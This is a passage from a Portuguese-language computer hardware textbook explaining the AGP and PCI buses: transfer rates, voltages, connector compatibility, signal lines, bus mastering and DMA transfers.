pelo slot.

115
As primeiras placas de CPU com barramento AGP operavam com 3,3
volts e suportavam apenas o modo AGP 1x. Depois surgiram placas
de CPU com chipsets capazes de operar em AGP 2x, também com
3,3 volts. Os slots AGP universais e os de 1,5 volts são encontrados
nas placas capazes de operar em 4x. O modo 4x exige a tensão de
1,5 volts, o mesmo ocorrendo com o modo 8x.
Uma placa AGP 2x de 3,3 volts não pode ser conectada em um slot
AGP de 1,5 volts, mas poderá ser encaixada em um slot AGP univer-
sal. Esses slots suportam o modo 4x, mas quando a placa de vídeo é
2x, a taxa de transferência será limitada pela placa de vídeo, apesar
da placa de CPU poder chegar até 4x.

Versões do AGP

O barramento AGP versão 1.0 foi o primeiro a ser utilizado em placas


de CPU e placas de vídeo. Esta versão oferecia os modos 1x e 2x,
porém as primeiras implementações operavam apenas em 1x. A pró-
xima especificação foi a AGP 2.0, que estendeu a velocidade para 4x,
e finalmente a 3.0 que oferece transferências em até 8x. Além do
aumento de velocidade, novas opções de voltagem foram introduzi-
das, bem como algumas outras modificações no funcionamento.

Cada versão nova tem compatibilidade com as versões anteriores,


desde que seja respeitado o tipo de conector. Por exemplo, uma pla-
ca de CPU compatível com AGP 3.0 e use slot de 1,5 volts, aceitará
operar nos modos 4x e 8x. Placas de CPU AGP 3.0 universais supor-
tam também operações em modos 1x e 2x.

AGP 1x, 2x e 4x

O barramento AGP é bastante semelhante ao PCI, mas com algumas


modificações voltadas para placas de vídeo. Opera com 32 bits e 66
MHz. Na sua versão inicial (AGP 1x), cada clock realiza uma transfe-
rência de 32 bits (4 bytes). Como são 66 MHz (na verdade são 66,66
MHz), temos 66 milhões de transferências por segundo. Sendo as
transferências de 4 bytes, o número total de bytes por segundo que
podem passar pelo barramento AGP 1x é:

116
66,66 MHz x 4 bytes = 266 MB/s

Esta é uma taxa de transferência fantástica. Com ela é possível pre-


encher todo o conteúdo da memória de vídeo cerca de 90 vezes por
segundo (90 Hz), supondo uma resolução gráfica de 1024x768x32
bits. Isto é muito mais que os 30 Hz necessários para ter sensação
visual de continuidade de movimentos. Portanto 90 Hz pode parecer
um exagero, mas não é. O tráfego de dados no barramento AGP não
é simplesmente a transferência de “frames” para a memória de vídeo.
É preciso fazer continuamente a leitura de texturas que ficam na me-
mória RAM da placa de CPU, para que sejam automaticamente e
rapidamente aplicadas sobre os polígonos que formam as imagens
tridimensionais. O tráfego de dados pelo barramento AGP tende a ser
ainda mais elevado quando são usadas resoluções mais elevadas,
quando são geradas imagens complexas e quando a resolução das
texturas é muito elevada. Por isso existem versões novas do barra-
mento AGP, capazes de operar com taxas ainda mais elevadas.

Figura 13

Desde a criação do barramento AGP, já era previsto o aumento da


sua taxa de transferência, utilizando os modos 2x e 4x, e mais recen-
temente, 8x. O modo 2x também opera com 32 bits e 66 MHz, porém
em cada período de clock, são feitas duas transferências, ao invés de
apenas uma. A figura 13 compara as transferências de dados nos
barramentos AGP 1x e 2x. Note que em ambos os casos, o sinal de
clock (CLK) é o mesmo, mas no modo 2x é usado o sinal AD_STB
para indicar a presença de dados válidos no barramento.

117
Nos instantes em que o sinal AD_STB varia de 1 para 0, ou de 0 para
1, o barramento está pronto para fazer uma transferência. Como em
cada ciclo de clock (indicados na figura pelos números 1, 2, etc.) exis-
tem duas transições de AD_STB, temos duas transferências a cada
ciclo. Portanto a taxa de transferência no modo 2x é dada por:
66,66 MHz x 2 x 4 bytes = 533 MB/s

O modo 4x utiliza um processo similar. A principal diferença é que o


sinal AD_STB apresenta 4 transições a cada período de clock, por-
tanto são feitas 4 transferências em cada ciclo. A taxa de transferên-
cia no modo 4x é então:

66,66 MHz x 4 x 4 bytes = 1066 MB/s

As primeiras placas de CPU com slot AGP possuíam suporte apenas


para o modo 1x, bem como ocorria com as primeiras placas de vídeo
AGP. Em 1999 já era comum encontrar placas de CPU e placas de
vídeo, ambas capazes de operar no modo AGP 2x. Em 2000, prati-
camente todas as placas de CPU, e boa parte das placas de vídeo
modernas operavam em AGP 4x.

AGP 8x

O modo AGP 8x faz parte da especificação AGP 3.0. Sua principal


característica é o uso de taxas de transferência 8 vezes maiores que
as oferecidas pelo AGP 1x. Em modo 8x, a taxa de transferência teó-
rica máxima é de 2133 MB/s. Esta taxa é obtida com o uso de 8
transferências por ciclo, usando o mesmo clock básico de 66 MHz
utilizado por todas as versões do AGP. Apesar do clock ser de 66
MHz, o barramento tem dois sinais complementares AD_STBS e
AD_STBF, cujas transições são 4 vezes mais rápidas que o clock do
barramento AGP. Os instantes de subida desses dois sinais marcam
a transferência dos dados, como mostra a figura 15.

118
Figura 15

Tabela de compatibilidade

Os chanfros existentes nos conectores AGP da placa de CPU e da


placa de vídeo são os indicadores de compatibilidade entre essas
placas. Todas as opções de compatibilidade são apresentadas na
tabela abaixo:

Placa de CPU Conector Compatibilidade


AGP
AGP 1.0, 3.3 volts AGP 3,3 V Opera com placas de vídeo
AGP de 3,3 volts. As veloci-
dades suportadas são 1x e
2x, porém isto ainda depen-
de do chipset da placa de
CPU e do chip gráfico da
placa AGP.
AGP 2.0, 1,5 volt AGP 1,5 volt Suporta placas AGP de 1,5
volts. Os modos disponíveis
são 1x, 2x e 4x, dependendo
do chipset da placa de CPU
e do chip gráfico da placa
AGP.
AGP 2.0 universal Universal Suporta placas AGP de 1,5V
(UAGP) (UAGP) e 3,3V, com velocidades de
1x, 2x e 4x, dependendo do
chipset da placa de CPU e

119
do chip gráfico da placa
AGP.
AGP 3.0 AGP de 1,5 Suporta apenas placas de
volt vídeo AGP 3,0 com veloci-
dades de 4x e 8x, depen-
dendo do chipset da placa de
CPU e do chip gráfico da
placa AGP.
AGP 3.0 universal AGP de 1,5 Suporta taxas AGP 1x, 2x,
volt 4x e 8x em modos AGP 2.0 e
AGP 3.0.

Apesar do padrão AGP 3.0 especificar uma tensão se 0,7 volts, não
foi criado um soquete especial para esta nova voltagem.

Este padrão utiliza o soquete de 1,5 volts, porém tanto a placa de


CPU quanto a placa de vídeo AGP no padrão 3.0 são capazes de
identificar a voltagem correta, graças a dois novos sinais introduzidos
no barramento: MB_DET e GC_DET.

Através do sinal MB_DET, a placa de vídeo AGP pode identificar se a


placa de CPU tem slot AGP 3.0. Caso tenha, a placa de vídeo irá
operar com 0,7 volts, e caso não tenha, irá operar com 1,5 volt.

Da mesma forma, através do novo sinal GC_DET, a placa de CPU no


padrão AGP 3.0 irá detectar se a placa de vídeo também é AGP 3.0.
Caso seja, passará a operar com 0,7 volts, e caso não seja, usará
tensões de 1,5 volts.

A tabela abaixo mostra as voltagens que serão usadas na comunica-


ção entre a placa de vídeo e a placa de CPU, em função dos tipos
dessas placas e dos seus conectores.

Placa de vídeo
Placa CPU AGP 3,3V AGP 1,5V UAGP AGP 3.0 UAGP 3.0
AGP 3,3 V 3,3 V N.E. 3,3V N.E. N.E.
AGP 1,5V N.E. 1,5 V 1,5 V 1,5 V 1,5 V
UAGP 3,3 V 1,5 V 1,5 V 1,5 V 1,5 V

120
AGP 3.0 N.E. 1,5 V 1,5 V 0,7 V 0,7 V
UAGP 3.0 N.E. 1,5 V 1,5 V 0,7 V 0,7 V

AGP Pro

O slot AGP Pro é uma versão ampliada do AGP, cuja principal carac-
terística é a maior capacidade de fornecimento de corrente. Seu slot é
maior, com maior número de contatos, e nesses contatos adicionais
existem mais linhas de alimentação. O maior fornecimento de corren-
te é necessário para as placas AGP de maior desempenho, muitas
delas chegando a dissipar mais de 50 watts, possuindo inclusive um
cooler sobre o seu chip gráfico, similar aos utilizados nos processado-
res.

Podemos ver um slot AGP Pro na figura 16. Comparando com o slot
AGP comum, mostrado na figura 17, podemos observar que o AGP
Pro é bem maior.

Um slot AGP comum é um pouco menor que os slots PCI. O slot AGP
Pro, por sua vez, é visivelmente maior que um slot PCI

Figura 16
O slot AGP Pro é maior que os slots PCI.

Figura 17

121
O slot AGP comum é menor que os slots PCI.

Módulo de memória AGP

A Intel criou um módulo de memória que pode ser conectado direta-


mente em um slot AGP. São os módulos AIMM (Agp Inline Memory
Module). Placas de CPU com vídeo on-board e que usam memória
compartilhada têm como principal desvantagem a queda do desem-
penho do processador, já que o processador e os circuitos de vídeo
concorrem pelo acesso à mesma memória.

Uma solução para o problema é instalar uma placa de vídeo AGP,


desde que exista slot AGP disponível. Uma outra solução é conectar
no slot AGP, uma memória de vídeo exclusiva, que consiste em um
módulo AIMM.

Figura 18
Módulo AIMM.

Mecanismo de retenção AGP

Muitas placas de CPU são acompanhadas atualmente de um meca-


nismo de retenção AGP. Trata-se de uma peça plástica que é encai-
xada sobre o slot e tendo como objetivo travar a placa de vídeo ou o

122
módulo AIMM. Este módulo, pelo fato de não usar travas como ocorre
com os módulos SIMM e DIMM, pode afrouxar com o passar do tem-
po, devido à vibração. O mesmo pode ocorrer até mesmo com as
placas de vídeo AGP, principalmente durante o transporte.

Figura 19
Esta placa AGP está mal encaixada, devido à vibração ou transporte.

O mecanismo de retenção AGP deve ser inicialmente encaixado so-


bre o slot AGP. Uma vez encaixado, não pode mais ser removido, a
menos que seja inutilizado. Ao encaixar uma placa, devemos mover a
alça do mecanismo, permitindo o encaixe da placa. Feito isto, libera-
mos a alça, que irá prender a placa no slot. Para remover a placa do
slot, devemos antes mover a alça do mecanismo de retenção, destra-
vando a placa. O mesmo procedimento é usado para encaixar e re-
mover módulos AIMM.
Figura 20
Usando o mecanismo de retenção AGP.

123
Sinais do barramento AGP

Como vimos, o barramento AGP foi desenvolvimento tomando como


base o barramento PCI. Podemos dizer que o AGP é o resultado de
melhoramentos feitos a partir do PCI, aumentando a velocidade e
adicionando algumas funções específicas para operação de placas
3D.
Figura 21
Relação entre os barramentos PCI e AGP.

Os barramentos PCI e AGP são totalmente independentes. A cone-


xão entre o processador, a memória e barramento AGP é feito pelo
chipset conhecido como ponte norte.

Em geral temos o barramento AGP fisicamente representado por um


slot, no qual é encaixada a placa de vídeo AGP.

Na figura temos a placa representada como “3D Acell”. O módulo LFB


(local frame buffer) é a memória de vídeo existente nesta placa.

As placas AGP são capazes de utilizar tanto a sua própria memória


local quanto a memória do sistema.

124
Figura 22
Sinais do barramento AGP.

A figura 22 mostra os sinais do barramento AGP. São inteiramente


gerados pelo chipset. Observe que existem sinais de entrada, outros
de saída e outros bidirecionais. Os principais sinais são descritos a
seguir.

Sinal Descrição
AD0-AD31 Barramento de dados e endereços. Ao contrário
de outros barramentos que usam sinais indepen-
detes para dados e endereços, o AGP utiliza um
único barramento multiplexado. A cada operação,
o barramento indicará o endereço, e a seguir os
dados. Isso pode parecer causa de lentidão, mas

125
não é. Na maior parte do tempo o barramento
AGP necessita que seja indicado apenas o ende-
reço inicial, e os dados vêm a seguir, em modo
burst.
C/BE0-C/BE3 Esses 4 sinais têm dupla finalidade. Quando o
barramento AD0-AD31 está fornecendo um ende-
reço, os sinais C/BE0-C/BE3 indicam o comando
que deve ser realizado (leitura, escrita, etc.). Nos
períodos em que dados estão trafegando, esses 4
sinais indicam quais grupos de 8 bits devem ser
levados em conta. Ao fazer transferências de 32
bits, os 4 sinais ficam ativados, mas podem ser
ativados 1, 2 ou 3 sinais individualmente, permi-
tindo acesso a trechos menores. Por exemplo,
para escrever um pixel na tela em um modo gráfi-
co de 256 cores (1 byte por pixel), um único sinal
C/BE deve ser ativado para indicar o pixel correto.
IRDY Initiator Ready. O dispositivo que iniciou a tranfe-
rência indica que está pronto para receber dados.
Desta forma é feita uma sincronização entre a
placa de CPU e a placa de vídeo. Quando uma
placa é mais lenta que outra, este sinal servirá
para introduzir wait states, fazendo com que a
mais rápida espere pela mais lenta, quando ne-
cessário.
TRDY Target Ready. Tem função semelhante à do sinal
TRDY, mas diz respeito ao dispositivo que está
sendo acessado. Por exemplo, quando a placa de
CPU quer ler dados da memória de vídeo, a placa
de CPU opera como Initiator ou Master, e a placa
de vídeo opera como Target (alvo). A placa de
vídeo, que neste caso opera como Target, usará
este sinal para indicar que está com um dado
disponível, ou que está pronta para receber um
novo dado. Este protocolo faz a sincronização de
placas de desempenhos diferentes, mediante a
introdução de wait states, quando necessário.
Não adianta por exemplo operar em modo AGP

126
8x e a placa de vídeo usar memórias lentas. Isto
fará com que sejam gerados wait states, resultan-
do em desempenho inferior.
SBA0-SBA7 Os sinais AD0-AD31 podem ser usados para en-
dereços e dados, ou podem ser usados exclusi-
vamente para dados. Nesse caso os endereços
são enviados através do barramento SBA0-SBA7.
O ideal seria que esses endereços usassem um
barramento também de 32 bits, mas são usados
apenas 8 para que o número total de pinos do
conector não seja exagerado. Este barramento
opera em alta velocidade, assim como o barra-
mento de dados. Em modo 2x, por exemplo, cada
período de clock fornecerá 16 bits, e em 4x cada
período fornecerá 32 bits. Desta forma temos
barramentos de dados e endereços independen-
tes. Apesar do barramento de endereços ter ape-
nas 8 bits, isto não prejudica o desempenho, já
que na maioria das operações o endereço é es-
pecificado apenas no início da transferência de
uma longa seqüência de dados.
AD_STB Strobe para o barramento de dados. Este sinal é
usado para sincronizar o tráfego através do bar-
ramento AD0-AD31.
SB_STB Este sinal é usado para sincronizar as transferên-
cias no barramento SBA0-SBA7.
PIPE Este sinal deve ser ativado durante o uso do bar-
ramento AD0-AD31. O número de ciclos nos
quais este sinal fica ativo está relacionado com o
número de transferências a serem efetuadas.
FRAME Tem a mesma função que o sinal PIPE. A diferen-
ça é que FRAME é usado para transferências no
modo PCI, enquanto PIPE é usado para transfe-
rências no modo AGP.

O AGP não é simplesmente baseado no PCI. O barramento AGP


contém todos os sinais do barramento PCI, e pode ser portanto trata-
do como um dispositivo PCI de maior velocidade.

127
Isso possibilitou aos fabricantes de placas de vídeo, converterem
rapidamente suas placas de vídeo PCI para que usem o slot AGP.

Além de suportar os comandos e modos de operação do barramento


PCI, o barramento AGP possui modos de operação próprios, mais
adequados às operações relacionadas com vídeo 3D.

Figura 23

A figura 23 mostra o diagrama da conexão entre uma placa AGP e a


placa de CPU. Note que existe uma seção específica para os coman-
dos PCI e outras especializadas em comandos típicos do AGP.

Modos DMA e Execute

Para gerar uma imagem 2D, uma única estrutura de dados é neces-
sária. É o frame buffer, uma representação linear do conteúdo da tela.
Nas placas de vídeo 2D, toda a memória de vídeo é utilizada como
frame buffer. Já a representação de imagens tridimensionais exige
outras estruturas.

O frame buffer é usado, assim como nas placas 2D, para manter uma
imagem exata do que é apresentado na tela, porém a memória de

128
vídeo de placas 3D necessita de outras estruturas de dados para uma
representação tridimensional completa.

O Z-Buffer é a área da memória de vídeo responsável pela represen-


tação da terceira coordenada (Z). As texturas são imagens bidimensi-
onais que são aplicadas a polígonos no espaço tridimensional.

O Stencil Buffer é uma outra estrutura de dados usada no processa-


mento de imagens refletidas. As placas 3D baseadas no barramento
PCI mantinham todas essas estruturas de dados na sua própria me-
mória de vídeo.

O barramento AGP permite que essas informações sejam armazena-


das tanto na memória de vídeo quanto na memória do sistema, locali-
zada na placa de CPU.

Ao operar no modo DMA, todas as estruturas de dados envolvidas na


formação das imagens 3D ficam armazenadas no frame buffer da
placa AGP. A cada cena 3D representada, as texturas têm que ser
carregadas na memória de vídeo, e tanto o Z-Buffer como o Stencil
Buffer têm que ser calculados para cada posição e transferidos para a
placa de vídeo. Este elevado tráfego de dados ao longo do barramen-
to AGP pode prejudicar

O outro modo suportado pelo barramento AGP é o DIME (DIrect Me-


mory Execute). Neste modo as estruturas de dados podem ficar ar-
mazenados na memória do sistema. Tanto o frame buffer como o Z-
Buffer, o Stencil Buffer e as texturas podem ficar na memória da placa
de vídeo ou na memória do sistema. Decidir se cada estrutura fica em
uma ou em outra memória tem impacto direto no desempenho gráfi-
co.

Por exemplo, é sempre melhor manter o frame buffer na memória de


vídeo, e não na memória do sistema, já que esta área é constante-
mente lida para suas informações serem entregues ao monitor. Para
imagens com uma modesta resolução de 800x600 com 16 bits por
pixel e taxa de atualização de 75 Hz para o monitor, o tráfego de da-
dos do frame buffer é superior a 500 MB/s. É um tráfego muito eleva-
do em comparação com os 800 MB/s suportados por um barramento

129
de memória PC100, e mesmo comparando com os 1066 MB/s ofere-
cidos pelas memórias PC133.

Este é um sério problema do vídeo on-board com memória comparti-


lhada. Ao usar o frame buffer na memória da placa de vídeo, tanto a
resolução como o número de cores e a taxa de atualização podem
ser elevadas, sem sobrecarregar a memória do sistema.

As demais estruturas de dados podem ficar na memória de vídeo ou


na memória do sistema, e impacto no desempenho dependerá da
utilização. Mantê-las todas na memória de vídeo (modo DMA) resulta
em alto desempenho, mas tem como desvantagem a perda de tempo
realizando as todas as transferências. Note que apesar do padrão
AGP oferecer o modo DIME, nem todos os chips gráficos o suportam,
e nem todos os programas 3D o utilizam. Para compensar a ausência
do modo DIME, a placa de vídeo deve ter uma generosa quantidade
de memória de vídeo.

Barramento PCI

A figura 24 mostra os conectores usados no barramento PCI (Pe-


ripheral Component Interconnect). Nas placas de CPU (MB) mais
antigas, podemos encontrar 3, 4, 5 ou 6 slots PCI. Em algumas pla-
cas mais simples, tipicamente aquelas que têm “tudo on-board”, po-
demos encontrar apenas um ou dois slots PCI.

Figura 24
Slots PCI.

130
Nos slots PCI, conectamos placas de expansão PCI. Alguns exem-
plos típicos de placas de expansão PCI são:

 Placa de vídeo (SVGA)


 Placa de interface SCSI
 Placa de rede
 Placa digitalizadora de vídeo

Figura 25
Placas de expansão PCI:
Uma placa de vídeo e uma controladora SCSI.

É importante notar que Barramento PCI não é sinônimo de Slot PCI.


O Barramento PCI é um conjunto de sinais digitais que partem do
chipset e do processador, e atingem tanto as placas de expansão,
através dos slots, como circuitos da placa de CPU.

Por exemplo, as interfaces para disco rígido e as interfaces USB em-


butidas na placa de CPU são controladas através do barramento PCI,
apesar de não utilizar os slots.

Tipos de PCI

Na maioria das placas de CPU, o barramento PCI opera com 32 bits


e utiliza um clock de 33 MHz. Podemos entretanto encontrar algumas
variações. Em placas de CPU antigas podemos encontrar o barra-
mento PCI operando com 25 ou 30 MHz. Em placas que operam com
overclock externo, o clock do barramento PCI pode estar indevida-
mente programado para 37,5 MHz ou 41,6 MHz, resultando em mau
funcionamento. Existem ainda as placas de CPU de alto desempe-
nho, próprias para servidores, nos quais temos barramentos PCI de
64 bits e 66 MHz.

131
A taxa de transferência máxima teórica do barramento PCI depende
portanto das suas características.

A tabela abaixo mostra as principais opções:


Clock Número de Taxa de transfe-
bits rência
33 MHz 32 133 MB/s
33 MHz 64 266 MB/s
66 MHz 32 266 MB/s
66 MHz 64 533 MB/s

Logo na primeira versão do PCI, apesar de operar com 32 bits, esta-


va previsto o funcionamento com 64 bits. O slot PCI de 64 bits é dife-
rente do 32 bits. Possui duas seções, sendo uma análoga ao de 32
bits e outra menor, com os sinais necessários ao funcionamento em
64 bits.

Figura 26
Slots PCI de 32 e de 64 bits.

Mais recentemente o barramento PCI sofreu uma revisão e agora


suporta também a operação em 66 MHz, tanto em 32 como em 64
bits. Este aumento foi motivado principalmente pelas novas interfaces
SCSI, capazes de operar com taxas de 320 MB/s. O barramento PCI
de 66 MHz e 64 bits, com sua taxa de transferência máxima de 533
MB/s, suporta perfeitamente este tipo de interface.

132
Obviamente só encontramos esta configuração em servidores e esta-
ções de trabalho de alto desempenho.

Além das opções usuais de 32 e 64 bits, 33 e 66 MHz, podemos en-


contrar em algumas placas de CPU antigas (e mesmo em algumas
mais novas), alguns clocks incomuns em uso no barramento PCI.

A tabela abaixo mostra algumas dessas opções e as respectivas ta-


xas de transferência. Note que valores acima de 33 MHz são conside-
rados overclock. Mesmo que a placa de CPU possa gerar esses valo-
res, nem sempre as placas de expansão PCI irão suportá-los.

Clock Número Taxa de transferência


de bits
25 MHz 32 100 MB/s
30 MHz 32 120 MB/s
33 MHz 32 133 MB/s
37,5 MHz 32 150 MB/s
41,6 MHz 32 166 MB/s
36,6 MHz 32 146,4 MB/s
38,3 MHz 32 153,2 MB/s

Nas placas de CPU Pentium antigas, o clock do barramento PCI era


sempre igual à metade do clock externo do processador. Com clock
externo de 66 MHz, o resultado era o barramento PCI operando a 33
MHz. No processador Pentium-75, por exemplo, o clock externo é de
50 MHz, portanto o barramento PCI passa a operar com apenas 25
MHz, já que tais placas são programadas para usar no barramento
PCI, a metade do clock do processador.

Da mesma forma no Pentium-90, Pentium-120 e Pentium-150, o clock


externo é 60 MHz, portanto o barramento PCI opera com 30 MHz.
Quando é feito overclock externo nessas antigas placas, obrigando o
processador a operar com 75 ou 83 MHz externos, o barramento PCI
opera com a metade desses valores, o que corresponde a 37,5 MHz
e 41,6 MHz.

133
Na maioria das placas de CPU com clock externo de 100 MHz, o
barramento PCI opera com 1/3 do clock externo do processador, re-
sultando em 33 MHz, mas pode resultar em valores maiores quando
é usado overclock. Muitas placas de CPU mais recentes têm gerado-
res de clock independentes para o processador e para o barramento
PCI.
Desta forma o barramento PCI pode ser mantido em 33 MHz, mesmo
que o processador esteja usando overclock externo.

Voltagens do PCI

Na sua especificação original, o barramento PCI podia operar a partir


de uma alimentação de +5 volts ou de +3,3 volts. Para impedir a co-
nexão de placas incompatíveis, os slots PCI utilizam um chanfro que
deve coincidir com outro chanfro localizado na placa de expansão.
Nos slots de 3,3 volts, este chanfro fica mais próximo da parte trasei-
ra da placa de CPU.
Nos slots de 5 volts o chanfro fica no lado oposto. A figura 27 mostra
os tipos de slots PCI em função da sua voltagem.

Figura 27
Slots de 5 volts e de 3,3 volts.

134
Os slots e placas de 5 volts são os mais usados. Praticamente não
encontramos versões de 3,3 volts. Podemos entretanto encontrar
algumas placas de expansão PCI que são universais, podendo funci-
onar tanto em slots de 5 como de 3,3 volts. Essas placas possuem
dois chanfros no seu conector, como mostra a figura 28.

Figura 28
Placa PCI universal de 5 e 3,3 volts.

Placa PCI Express

135
Master e Target

As transferências realizadas no barramento PCI são sempre feitas


entre dois dispositivos, um deles é o Bus Master ou Initiator, o outro é
o Target (alvo). O Bus Master é aquele que toma a iniciativa de solici-
tar a transferência do Target. O Bus Master é o responsável pela
geração de todos os sinais de endereços, controles e dados (no caso
de escrita). Quando o computador é ligado, o processador da placa
mãe é o Bus Master, ele é o responsável por comandar a inicialização
do hardware, incluindo o chipset e as placas de expansão. Outros
dispositivos também podem atuar como Bus Masters, como interfaces
IDE e interfaces SCSI.

Para que um dispositivo opere como Bus Master, precisa inicialmente


pedir permissão ao Bus Arbitrer, que faz parte do chipset. Do Bus
Arbitrer partem várias linhas REQ (request) e GNT (Grant).

Cada par REQ/GNT é ligado a um dispositivo PCI diferente. No caso


dos slots, cada um deles tem um sinal REQ próprio, através do qual
envia ao chipset o pedido de requisição para que tome o controle do
barramento. Ao receber esta requisição, o Bus Arbitrer verifica se é
possível dar a permissão e envia para o dispositivo que a requereu, o
sinal GNT apropriado. Cada dispositivo e cada slot possui seu próprio
sinal GNT. A maioria dos chipsets atuais possuem 4, 5 ou 6 pares
REQ/GNT, através dos quais podem ser conectados 4, 5 ou 6 dispo-
sitivos PCI capazes de atuar como Bus Masters.

Existem entretanto algumas placas nas quais apenas alguns slots


PCI são Bus Masters, enquanto outros slots atuam apenas como
Target.

Ao passar por problemas de funcionamento de placas PCI, experi-


mente a troca do slot. Consulte o manual da placa de CPU para veri-
ficar se todos os slots podem operar como Bus Masters.

Placas de som, placas de rede, controladoras SCSI e digitalizadores


de vídeo, bem como interfaces rápidas em geral, operam em modo
Bus Master.

136
Placas de vídeo PCI e modems operam como Target, portanto podem
ser remanejadas para slots que não suportam Bus Mastering.

Sinais do barramento PCI

A seguir apresentamos alguns dos sinais de maior importância no


barramento PCI, juntamente com sua descrição.

Sinal Descrição
AD0-AD31 Barramento de dados e endereços multiplexados. No
início de uma transferência, este barramento indica o
endereço, e na fase seguinte, os dados. Como muitas
transferências são feitas em modo burst, não existe
queda de desempenho perceptível pelo fato de ser
usado um único barramento para dupla função.
C/BE0-C/BE3 Durante a fase de endereço, esses 4 sinais indicam o
comando a ser realizado (leitura, escrita, etc.). Na fase
de dados, esses 4 bits indicam quais bytes dos 32 bits
do barramento de dados devem ser levados em conta.
Isso permite, por exemplo, acessar bytes individuais,
apesar do barramento de dados ter 32 bits.
FRAME O Bus Master ativa este sinal para dar início a um ciclo
de transferência.
IRDY Initiator Ready. Indica que o Master está pronto para
ler ou enviar dados. Quando este sinal não é ativado,
o Target irá esperar tantos wait states quanto forem
necessários.
TRDY Target Ready. Indica que o Target está pronto para
receber dados (escrita) ou que o dado lido já está
disponível (leitura). Quando este sinal não é ativado, o
Master irá gerar tantos wait states quando forem ne-
cessários.
DEVSEL Ativado pelo Target quando reconhece o seu endere-
ço. Desta forma o Master pode saber se o dispositivo
Target está ativo ou presente no barramento.
REQ Requisição enviada ao Bus Arbitrer, para que o dispo-
sitivo se torne Bus Master. Cada dispositivo tem seu
próprio sinal REQ.
GNT Grant. Através deste sinal o Bus Arbitrer indica ao
dispositivo solicitante que o barramento está liberado,

137
permitindo assim que se torne Bus Master. Cada dis-
positivo tem seu próprio sinal GNT.
INTA, INTB, São linhas de interrupção a serem usadas pelos dis-
INTC, INTD positivos PCI. Cada dispositivo e cada slot é ligado a
um desses sinais, que podem ser compartilhados, ou
seja, uma mesma linha INT pode ser usada por mais
de um slot. O padrão PCI prevê o compartilhamento
de interrupções.
AD32-AD63 Continuação do barramento de dados e endereços
nos slots PCI de 64 bits.
C/BE4-C/BE7 Continuação do barramento de comando e habilitação
de bytes nos slots PCI de 64 bits.
REQ64 Requisição de transferência de 64 bits.
ACK64 Indica que o Target está apto a realizar transferência
de 64 bits.

Transferências

Vários tipos de transferência podem ser feitas no barramento PCI.


Essas transferências podem envolver um ou múltiplos dados. São
chamadas de transactions (transações), mas aqui chamaremos ape-
nas de transferências. A figura 29 mostra o diagrama de tempo de
uma operação de leitura, na qual são lidos 3 dados consecutivos.

Figura 29
Operação de leitura no barramento PCI.

138
Note que as operações são sincronizadas pelo clock. Durante o perí-
odo em que o barramento AD traz endereços, temos a fase de ende-
reços (address phase). Uma vez determinado o endereço, são feitas
as transferências de dados, entrando então na fase de dados (data
phase). Wait states podem ser gerados por solicitação do Target ou
do próprio Master, através dos controles IRDY e TRDY. Os eventos
que ocorrem nesta transferência são os seguintes:

a) O Bus Master inicia a transferência ativando o sinal FRAME, que


permanece ativo até que o Target termine sua última fase de dados.
O Master também fornece o endereço (AD0-AD31) e o comando
(C/BE0-C/BE3).

b) O Target reconhece seu endereço e prepara-se para fornecer os


dados.

c) O Master para de indicar o comando nas linhas C/BE e passa a


indicar os controles habilitadores dos bytes desejados.

d) O Target ativa a linha DEVSEL para indicar que foi endereçado,


fornece o primeiro dado e ativa a linha TRDY para indicar que o dado
está pronto. Wait states podem ser gerados se necessário, bastando
retardar a ativação de TRDY.

e) O Master lê o dado e altera as linhas C/BE, se necessário.

f) O Target desativa a linha TRDY enquanto busca o próximo dado,


gerando mais um wait state. Isto pode ser necessário quando os cir-
cuitos do Target não são suficientemente velozes.

g) Neste exemplo o Master ainda não está pronto para ler o próximo
dado, portanto ele desativa o sinal IRDY, gerando mais um wait state
que fará o Target manter os dados por mais um ciclo.

h) Após receber o último dado, o Master finaliza a transferência, de-


sativando a linha FRAME.

i) O Target é desativado, liberando o barramento de dados e desati-


vando os sinais TRDY e DEVSEL.

139
Este exemplo dá uma ideia geral de como ocorrem as transferências
no barramento PCI.

Outros tipos de transferência ocorrem de forma diferente, mas a ideia


básica é a mesma.
A execução do processo descrito acima opera em milésimos de se-
gundos.

Dispositivos de alta velocidade

A maioria dos dispositivos ligados ao barramento PCI são capazes de


operar como Master. O primeiro deles é o processador da placa de
CPU, que através do host bridge (faz parte do chipset), comunica-se
com o barramento PCI. Chamamos de bridge um circuito que faz a
interface entre dois barramentos. O host bridge é portanto um circuito
que faz a comunicação entre o barramento do sistema e o barramen-
to PCI. Através deste circuito o processador pode acessar qualquer
outro dispositivo PCI, ou seja, qualquer um deles pode funcionar co-
mo Target em transferências nas quais o processador é o Master.

As transferências entre o processador e dispositivos de E/S eram


feitas de duas formas nos PCs com arquiteturas antigas:

 E/S programada
 E/S por DMA

Esses dois métodos estão representados na figura 30. Na E/S pro-


gramada, cabe ao processador obter os dados na interface e colocá-
los na memória (nas operações de entrada), e obtê-los na memória e
entregá-los à interface apropriada (nas operações de saída). A vanta-
gem desta técnica é a simplicidade de circuitos, e a desvantagem
principal é que deixa o processador muito ocupado quando são trans-
feridos muitos dados em sequência.

140
Figura 30
E/S programada e E/S por DMA.

Na E/S por DMA, um circuito especial chamado controlador de DMA


toma o controle do barramento do processador e realiza a transferên-
cia, gastando o mínimo tempo possível. A transferência de um dado
através de DMA dura um único ciclo, sem monopolizar o barramento.
Enquanto na E/S programada o processador pode ficar ocupado en-
tre um dado e outro, testando se o próximo dado já pode ser transfe-
rido, na E/S por DMA o processador pode executar outras tarefas
enquanto o controlador de DMA se encarrega da transferência.

O controlador de DMA pode tomar o controle do barramento do sis-


tema graças a dois sinais existentes nos processadores: HOLD e
HLDA (Hold Acknowledge). Quando a interface tem um dado pronto
para entregar, envia um comando para o controlador de DMA (DMA
Request), que por sua vez ativará o sinal HOLD do processador. O
processador termina a execução do ciclo em andamento e entra em
tristate, “congelando” sua atividade, e envia para o controlador de
DMA o sinal de HLDA, reconhecendo o estado de HOLD.

A partir daí o controlador de DMA, que antes estava em tristate, pas-


sa a gerar os sinais de endereço, dados e controle, passando a ser o
“mestre” do barramento. O controlador de DMA envia para a interfa-
ce, um sinal de DMAACK (DMA Acknowledge, ou reconhecimento de
DMA). A interface pode então entregar o dado para o barramento e
enviando para a memória (nas operações de entrada), ou então obter
o dado da memória (nas operações de saída).

141
Quanto mais lento é um periférico, mais adequada é a transferência
por E/S programada, e quanto mais rápido, mais adequada é a trans-
ferência por DMA.

Vejamos alguns exemplo, considerando o uso de um barramento


externo de 100 MHz para o processador. Supondo que as memórias
operem com temporização 2-1-1-1, teríamos cerca de 80 milhões de
